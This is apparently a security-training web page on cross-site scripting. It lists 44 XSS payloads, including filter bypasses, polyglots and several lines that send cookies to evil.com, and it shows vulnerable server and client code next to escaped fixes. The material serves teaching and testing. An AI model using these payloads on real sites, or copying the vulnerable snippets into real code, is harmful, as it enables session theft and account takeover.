SecurityInfinity
ScannersCVE FeedPricingBug BountyTraining
SecurityInfinity
ScannersCVE FeedPricingBug BountyTraining
Back to Overview
HIGH SEVERITYCWE-79•44 Payloads

Cross-Site Scripting (XSS)

XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. These scripts can steal session tokens, redirect users to malicious sites, or perform actions on behalf of the victim.

85%
of Web Apps Vulnerable
#3
OWASP Top 10 2021
3
XSS Types
$$
Bug Bounty Value

XSS Payloads(44 payloads)

<script>alert('XSS')</script>
Basic script injectionReflected XSS
<script>alert(document.domain)</script>
Domain exfiltrationReflected XSS
<script>alert(document.cookie)</script>
Cookie stealingReflected XSS
<img src=x onerror=alert('XSS')>
Image error handlerReflected XSS
<svg onload=alert('XSS')>
SVG onload eventReflected XSS
<body onload=alert('XSS')>
Body onload eventReflected XSS
<input onfocus=alert('XSS') autofocus>
Input autofocusReflected XSS
<marquee onstart=alert('XSS')>
Marquee onstartReflected XSS
<video><source onerror=alert('XSS')>
Video source errorReflected XSS
<details open ontoggle=alert('XSS')>
Details toggle eventReflected XSS
<script>fetch('https://evil.com?c='+document.cookie)</script>
Cookie exfiltration to external serverStored XSS
<img src=x onerror=new Image().src='https://evil.com?c='+document.cookie>
Cookie theft via imageStored XSS
<script>document.location='https://evil.com?c='+document.cookie</script>
Redirect with cookiesStored XSS
<iframe srcdoc='<script>alert(parent.document.domain)</script>'>
Iframe srcdoc injectionStored XSS
<script>var i=new Image();i.src='https://evil.com/log?'+document.cookie;</script>
Silent cookie loggingStored XSS
javascript:alert(document.domain)
JavaScript protocol handlerDOM-based XSS
#<script>alert('XSS')</script>
Fragment identifier injectionDOM-based XSS
'-alert(1)-'
DOM string breakoutDOM-based XSS
\'-alert(1)//
Escaped string breakoutDOM-based XSS
</script><script>alert('XSS')</script>
Script tag breakoutDOM-based XSS
{{constructor.constructor('alert(1)')()}}
Angular expressionDOM-based XSS
${alert(1)}
Template literal injectionDOM-based XSS
<ScRiPt>alert('XSS')</ScRiPt>
Mixed case bypassFilter Bypass
<scr<script>ipt>alert('XSS')</scr</script>ipt>
Nested tag bypassFilter Bypass
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
HTML entity encodingFilter Bypass
<img src=x onerror=\u0061lert(1)>
Unicode escapeFilter Bypass
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
Base64 encoded payloadFilter Bypass
<img src=x onerror=alert`1`>
Template literal function callFilter Bypass
<svg/onload=alert('XSS')>
Slash instead of spaceFilter Bypass
<svg onload=alert('XSS')>
Tab instead of spaceFilter Bypass
<img src=x onerror=alert&lpar;1&rpar;>
HTML entity parenthesesFilter Bypass
<a href="javascript:alert(1)">click</a>
Anchor with JS protocolFilter Bypass
<img src=x onerror=window['alert'](1)>
Bracket notationFilter Bypass
<img src=x onerror=this['ale'+'rt'](1)>
String concatenationFilter Bypass
<<script>script>alert('XSS')</</script>script>
Double angle bracketsFilter Bypass
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Universal polyglot payloadPolyglot
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
Multi-context polyglotPolyglot
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*&lt;svg/*/onload=alert()//>";
Portswigger polyglotPolyglot
{{$on.constructor('alert(1)')()}}
AngularJS sandbox escapeFramework-Specific
{{constructor.constructor('alert(1)')()}}
Vue.js template injectionFramework-Specific
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');
AngularJS 1.6+ bypassFramework-Specific
<div ng-app ng-csp><input ng-focus=$event.view.alert('XSS')>
Angular ng-focus with CSPFramework-Specific
[[${T(java.lang.Runtime).getRuntime().exec('calc')}]]
Thymeleaf SSTI (RCE)Framework-Specific
__proto__[innerHTML]=<img/src/onerror=alert(1)>
Prototype pollution to XSSFramework-Specific

Code Examples

// JavaScript - DOM XSS
document.getElementById('output').innerHTML = userInput;

// React - Dangerous HTML rendering
<div dangerouslySetInnerHTML={{__html: userInput}} />

// PHP - Reflected XSS
echo "<p>Hello, " . $_GET['name'] . "</p>";

// Node.js/Express
app.get('/search', (req, res) => {
    res.send(`<h1>Results for: ${req.query.q}</h1>`);
});

// Python/Flask
@app.route('/profile')
def profile():
    return f"<h1>Welcome, {request.args.get('name')}</h1>"

// Java/JSP
<%= request.getParameter("input") %>

// .NET Razor
@Html.Raw(Model.UserInput)
// JavaScript - Use textContent instead
document.getElementById('output').textContent = userInput;

// React - JSX auto-escapes by default
<div>{userInput}</div>

// PHP - htmlspecialchars
echo "<p>Hello, " . htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8') . "</p>";

// Node.js - Use template engine with auto-escaping
// or use a library like DOMPurify
const clean = DOMPurify.sanitize(userInput);

// Python/Flask - Use Jinja2 auto-escaping (enabled by default)
{{ user_input }}  {# Auto-escaped #}

// Java - Use OWASP Java Encoder
<%= Encode.forHtml(request.getParameter("input")) %>

// .NET - Html.Encode (default in Razor)
@Model.UserInput  // Auto-escaped
@Html.Encode(Model.UserInput)  // Explicit

Prevention Checklist

Resources

OWASP XSS Prevention Cheat SheetPortSwigger XSS GuideGoogle XSS GameXSS HunterContent Security Policy GuideDOMPurify Library
SecurityInfinity

Architecting the future of autonomous cybersecurity intelligence for a safer digital world.

Product

ScannersPricingBug BountyDocumentation

Resources

ResearchCybersecurityCVE DatabaseBlog

Training

Learning PathsHands-on LabsVulnerability TypesTech Blog

Company

About UsContact UsCEO's BlogPrivacy Policy
© 2026 SecurityInfinity. All rights reserved.
TermsPrivacyCookies